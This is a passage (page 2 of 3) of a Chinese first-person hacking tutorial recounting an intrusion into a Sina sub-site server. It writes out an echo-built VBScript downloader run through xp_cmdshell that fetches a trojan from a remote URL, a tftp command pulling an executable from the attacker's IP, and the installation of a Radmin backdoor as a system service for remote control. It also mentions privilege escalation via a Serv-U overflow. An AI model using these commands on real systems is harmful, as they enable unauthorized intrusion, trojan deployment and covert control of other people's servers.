入侵新浪分站服务器实战

但是在nbsi这样的工具的命令行中来执行很容易出错，在浏览器用;exec master.dbo.xp_cmdshell 'command'执行的时候转义更麻烦。
于是又想到一种办法，就是写个下载指定地址的木马的脚本如下：
echo iLocal = LCase^(Wscript.Arguments^(1^)^) >c:\vbs.vbs echo iRemote = LCase^(Wscript.Arguments^(0^)^) >>c:\vbs.vbs echo Set xPost = CreateObject^("Microsoft.XMLHTTP"^) >>c:\vbs.vbs echo xPost.Open "GET",iRemote,0 >>c:\vbs.vbs echo xPost.Send^(^) >>c:\vbs.vbs echo Set sGet = CreateObject^("ADODB.Stream"^) >>c:\vbs.vbs echo sGet.Mode = 3 >>c:\vbs.vbs echo sGet.Type = 1 >>c:\vbs.vbs echo sGet.Open^(^) >>c:\vbs.vbs echo sGet.Write^(xPost.responseBody^) >>c:\vbs.vbs echo sGet.SaveToFile iLocal,2 >>c:\vbs.vbs 这样就写到c盘根目录的vbs.vbs文件中去了，接着用这句话执行：
c:\vbs.vbs http://xxx.com/muma.exe c:\hehe.exe
这个方法可是很有效的哦，不过nbsi直接在nbsi或者其它注入工具命令行执行的时候会发生异常，自己在本机测试的时候一切正常，可是在nbsi中执行的时候二句以后的每句话都会被写入两次，极为郁闷，估计是nbsi运行原理不一样吧，谁知道这个问题怎么解决希望不吝赐教哦！如果在浏览器里面用xp_cmdshell执行，不过还要考虑“%,&"等字符，这些字符在asp里面会用到，所以要使用编码。
正郁闷着，忽然想到还有最简单直接的tftp还没用呢，在HDSI的命令行里执行tftp -i myip get 3721.exe c:\3721.exe，谢天谢地，我这边的tftp有反映了。

其实很多时候，即使我们得到了webdhell，用serv_u本地溢出或者sql什么的提升权限加了系统帐号，运行了木马。由于别人的服务器搞了ip安全策略，端口映射，边界路由阻隔，_blank">防火墙拦截等等，还是会有无法控制服务器的时候。呵呵，我就曾经入侵了几个大型网站，配置很bt，一直搞到现在还没搞定它的服务器！
好了，终于传完了，在HDSI的命令行里面执行c:\3721.exe，3721.exe是我自己配置好了的超级radmin服务端，注册为系统服务，端口为2046。再次感谢上帝，顺利的连上去了。马上屏幕监控看一下，好像锁定了，再用radmin直接控制，果然计算机处于锁定状态。

上一页  [1] [2] [3] 下一页